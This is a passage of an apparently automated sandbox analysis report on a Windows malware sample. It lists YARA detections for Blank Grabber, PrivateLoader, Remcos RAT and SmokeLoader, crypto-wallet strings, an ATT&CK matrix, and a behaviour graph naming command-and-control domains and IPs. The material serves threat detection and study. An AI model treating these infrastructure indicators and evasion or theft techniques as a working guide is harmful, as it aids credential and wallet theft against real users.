                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009EE5F4 GetLocalTime,10_2_009EE5F4
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009EE652 GetUserNameW,10_2_009EE652
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009CBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_009CBCD2
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
                        Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\SysWOW64\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2406506000.0000025F9EEDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2491188637.000001E8E77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.2469980302.000001FEA7818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000002.2582242198.000001E8E75F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2406506000.0000025F9EEDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 4348, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 3468, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 3588, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.key, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI35882\rarreg.key, type: DROPPED
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: DE5A.exe, 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                        Source: wsruwiiBinary or memory string: WIN_81
                        Source: wsruwiiBinary or memory string: WIN_XP
                        Source: wsruwii, 00000014.00000002.2902897025.0000000000203000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                        Source: wsruwiiBinary or memory string: WIN_XPe
                        Source: wsruwiiBinary or memory string: WIN_VISTA
                        Source: wsruwiiBinary or memory string: WIN_7
                        Source: wsruwiiBinary or memory string: WIN_8
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 3468, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Detected Remcos RAT
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2406506000.0000025F9EEDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2424175573.000001F012ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2491188637.000001E8E77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.2469980302.000001FEA7818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000002.2582242198.000001E8E75F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2406506000.0000025F9EEDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 4348, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 3468, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 3588, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.key, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI35882\rarreg.key, type: DROPPED
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A12263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00A12263
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A11C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00A11C61
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,20_2_001C2263
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,20_2_001C1C61

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure2
                        Valid Accounts                        		31
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Exploitation for Privilege Escalation                        		31
                        Disable or Modify Tools                        		21
                        Input Capture                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		4
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts2
                        Native API                        		2
                        Valid Accounts                        		1
                        Abuse Elevation Control Mechanism                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory1
                        Account Discovery                        		Remote Desktop Protocol11
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Exploitation for Client Execution                        		11
                        Registry Run Keys / Startup Folder                        		1
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		Security Account Manager13
                        File and Directory Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts112
                        Command and Scripting Interpreter                        		Login Hook2
                        Valid Accounts                        		21
                        Obfuscated Files or Information                        		NTDS48
                        System Information Discovery                        		Distributed Component Object Model3
                        Clipboard Data                        		1
                        Remote Access Software                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                        Access Token Manipulation                        		11
                        Software Packing                        		LSA Secrets1
                        Query Registry                        		SSHKeylogging4
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
                        Process Injection                        		1
                        Timestomp                        		Cached Domain Credentials551
                        Security Software Discovery                        		VNCGUI Input Capture15
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                        Registry Run Keys / Startup Folder                        		1
                        DLL Side-Loading                        		DCSync341
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Masquerading                        		Proc Filesystem4
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                        Valid Accounts                        		/etc/passwd and /etc/shadow11
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Modify Registry                        		Network Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd341
                        Virtualization/Sandbox Evasion                        		Input Capture1
                        Remote System Discovery                        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task21
                        Access Token Manipulation                        		Keylogging1
                        System Network Configuration Discovery                        		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers512
                        Process Injection                        		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                        Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                        Hidden Files and Directories                        		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1438370 Sample: Og1SeeXcB2.exe Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 110 uqxOPcjzRTNSjLPJLsvEoGgENV.uqxOPcjzRTNSjLPJLsvEoGgENV 2->110 112 makemoneyminds.com 2->112 114 7 other IPs or domains 2->114 142 Snort IDS alert for network traffic 2->142 144 Found malware configuration 2->144 146 Malicious sample detected (through community Yara rule) 2->146 148 16 other signatures 2->148 15 Og1SeeXcB2.exe 56 2->15         started        18 wsruwii 20 10 2->18         started        signatures3 process4 file5 108 C:\Users\user\AppData\Local\...\Phenomenon, DOS 15->108 dropped 20 cmd.exe 2 15->20         started        process6 file7 102 C:\Users\user\AppData\Local\...nd.pif, PE32 20->102 dropped 152 Uses ping.exe to sleep 20->152 154 Drops PE files with a suspicious file extension 20->154 156 Uses ping.exe to check the status of other devices and networks 20->156 24 End.pif 12 20->24         started        28 PING.EXE 1 20->28         started        30 cmd.exe 2 20->30         started        32 7 other processes 20->32 signatures8 process9 dnsIp10 116 2no.co 104.21.79.229, 443, 49731 CLOUDFLARENETUS United States 24->116 158 Found API chain indicative of debugger detection 24->158 160 Found API chain indicative of sandbox detection 24->160 162 Injects a PE file into a foreign processes 24->162 34 End.pif 24->34         started        37 End.pif 24->37         started        39 End.pif 24->39         started        118 127.0.0.1 unknown unknown 28->118 41 conhost.exe 28->41         started        signatures11 process12 signatures13 132 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 34->132 134 Maps a DLL or memory area into another process 34->134 136 Checks if the current machine is a virtual machine (disk enumeration) 34->136 138 Creates a thread in another existing process (thread injection) 34->138 43 explorer.exe 19 8 34->43 injected process14 dnsIp15 120 cellc.org 179.159.229.64, 49739, 49740, 49741 CLAROSABR Brazil 43->120 122 makemoneyminds.com 65.108.69.93, 443, 49743 ALABANZA-BALTUS United States 43->122 104 C:\Users\user\AppData\Roaming\wsruwii, PE32 43->104 dropped 106 C:\Users\user\AppData\Local\Temp\DE5A.exe, PE32+ 43->106 dropped 172 System process connects to network (likely due to code injection or exploit) 43->172 174 Benign windows process drops PE files 43->174 176 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->176 48 DE5A.exe 43->48         started        file16 signatures17 process18 file19 86 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 48->86 dropped 88 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 48->88 dropped 90 